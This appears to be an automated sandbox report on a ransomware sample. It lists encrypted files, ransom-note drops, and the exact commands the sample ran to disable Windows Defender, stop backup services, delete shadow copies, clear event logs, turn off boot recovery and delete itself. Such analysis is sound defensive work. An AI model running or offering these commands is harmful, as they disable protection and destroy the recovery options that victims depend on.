| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\SharpDXEngine\Rendering\Shaders\Builtin\HLSL\ConstantsPerObjectLighted.fx | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\Assets\contrast-black\OneConnectAppList.targetsize-20.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\Assets\contrast-white\OneConnectStoreLogo.scale-200.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\lt_60x42.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_1.0.454.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_dw4SwMlp9JM0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File created | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\6pZZ_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe\_Resources\index.txt | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-24_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\6pZZ_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_HEG65-qtGRY0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_n01ll9XwnfI0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-black\SmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_12d.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ee_60x42.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\al_16x11.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\LargeTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubStoreLogo.scale-100_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME.txt.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_aQM0v70TXzM0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.configuration_5.5.0.165303.jar.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_Y37lGUuQb8k0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_Z56HhfQYKdg0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5601_20x20x32.png | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_18.svg.el0PueNr8-qBMaf7BDnyErcFVkdtt4mWmo12YshKy2T_1MF9uUhGiJc0.eeyee | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe
"C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_13263" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_13263" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_13263" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SYSTEM32\notepad.exe
notepad.exe C:\6pZZ_HOW_TO_DECRYPT.txt
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\9797a79f00fe9d147bf3a649a54019e9c3763ea1a90d9015774439f9cd5e971c.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
memory/3468-115-0x0000000000000000-mapping.dmp
memory/2592-116-0x0000000000000000-mapping.dmp
memory/4048-117-0x0000000000000000-mapping.dmp
memory/3776-118-0x0000000000000000-mapping.dmp
memory/1324-119-0x0000000000000000-mapping.dmp
memory/648-120-0x0000000000000000-mapping.dmp
memory/896-121-0x0000000000000000-mapping.dmp
memory/1416-122-0x0000000000000000-mapping.dmp
memory/2328-123-0x0000000000000000-mapping.dmp
memory/1636-124-0x0000000000000000-mapping.dmp
memory/4076-125-0x0000000000000000-mapping.dmp
memory/4000-126-0x0000000000000000-mapping.dmp
memory/2180-127-0x0000000000000000-mapping.dmp
memory/1060-128-0x0000000000000000-mapping.dmp
memory/1408-129-0x0000000000000000-mapping.dmp
memory/2860-130-0x0000000000000000-mapping.dmp
memory/2748-131-0x0000000000000000-mapping.dmp
memory/392-132-0x0000000000000000-mapping.dmp
memory/492-133-0x0000000000000000-mapping.dmp
memory/1716-134-0x0000000000000000-mapping.dmp
memory/3424-135-0x0000000000000000-mapping.dmp
memory/1120-136-0x0000000000000000-mapping.dmp
memory/3864-137-0x0000000000000000-mapping.dmp
memory/1160-138-0x0000000000000000-mapping.dmp
memory/1444-139-0x0000000000000000-mapping.dmp
memory/388-140-0x0000000000000000-mapping.dmp
memory/2848-141-0x0000000000000000-mapping.dmp
memory/3684-142-0x0000000000000000-mapping.dmp
memory/3436-143-0x0000000000000000-mapping.dmp
memory/3972-144-0x0000000000000000-mapping.dmp
memory/3004-145-0x0000000000000000-mapping.dmp
memory/1784-146-0x0000000000000000-mapping.dmp
memory/1020-147-0x0000000000000000-mapping.dmp
memory/1184-148-0x0000000000000000-mapping.dmp
memory/3520-149-0x0000000000000000-mapping.dmp
memory/3984-150-0x0000000000000000-mapping.dmp
memory/2068-151-0x0000000000000000-mapping.dmp
memory/1104-152-0x0000000000000000-mapping.dmp
memory/3152-153-0x0000000000000000-mapping.dmp
memory/1768-154-0x0000000000000000-mapping.dmp
memory/1332-155-0x0000000000000000-mapping.dmp
memory/800-156-0x0000000000000000-mapping.dmp
memory/1180-157-0x0000000000000000-mapping.dmp
memory/368-158-0x0000000000000000-mapping.dmp
memory/2176-159-0x0000000000000000-mapping.dmp
memory/3280-160-0x0000000000000000-mapping.dmp
memory/4036-161-0x0000000000000000-mapping.dmp
memory/1500-162-0x0000000000000000-mapping.dmp
memory/1492-163-0x0000000000000000-mapping.dmp
memory/392-164-0x0000000000000000-mapping.dmp
memory/584-165-0x0000000000000000-mapping.dmp
memory/1280-166-0x0000000000000000-mapping.dmp
memory/412-167-0x0000000000000000-mapping.dmp
memory/2228-168-0x0000000000000000-mapping.dmp
memory/1400-169-0x0000000000000000-mapping.dmp
memory/2516-170-0x0000000000000000-mapping.dmp
memory/3760-171-0x0000000000000000-mapping.dmp
memory/784-172-0x0000000000000000-mapping.dmp
memory/2704-173-0x0000000000000000-mapping.dmp
memory/3476-174-0x0000000000000000-mapping.dmp
memory/1948-175-0x0000000000000000-mapping.dmp
memory/1896-176-0x0000000000000000-mapping.dmp
memory/3812-177-0x0000000000000000-mapping.dmp
memory/400-178-0x0000000000000000-mapping.dmp
memory/1300-180-0x00000269DE5F0000-0x00000269DE5F2000-memory.dmp
memory/1300-179-0x00000269DE5F0000-0x00000269DE5F2000-memory.dmp
memory/1300-181-0x00000269DE5F0000-0x00000269DE5F2000-memory.dmp
memory/1300-182-0x00000269DE5F0000-0x00000269DE5F2000-memory.dmp
memory/1300-183-0x00000269DEA10000-0x00000269DEA32000-memory.dmp
memory/1300-184-0x00000269DE5F0000-0x00000269DE5F2000-memory.dmp
memory/1300-185-0x00000269DE5F0000-0x00000269DE5F2000-memory.dmp
memory/1300-186-0x00000269DE5F0000-0x00000269DE5F2000-memory.dmp
memory/1300-187-0x00000269F78A0000-0x00000269F7916000-memory.dmp
memory/1300-188-0x00000269DE5F0000-0x00000269DE5F2000-memory.dmp
memory/1300-189-0x00000269DEA50000-0x00000269DEA52000-memory.dmp
memory/1300-190-0x00000269DEA53000-0x00000269DEA55000-memory.dmp
memory/1300-191-0x00000269DE5F0000-0x00000269DE5F2000-memory.dmp
memory/1300-211-0x00000269DEA56000-0x00000269DEA58000-memory.dmp
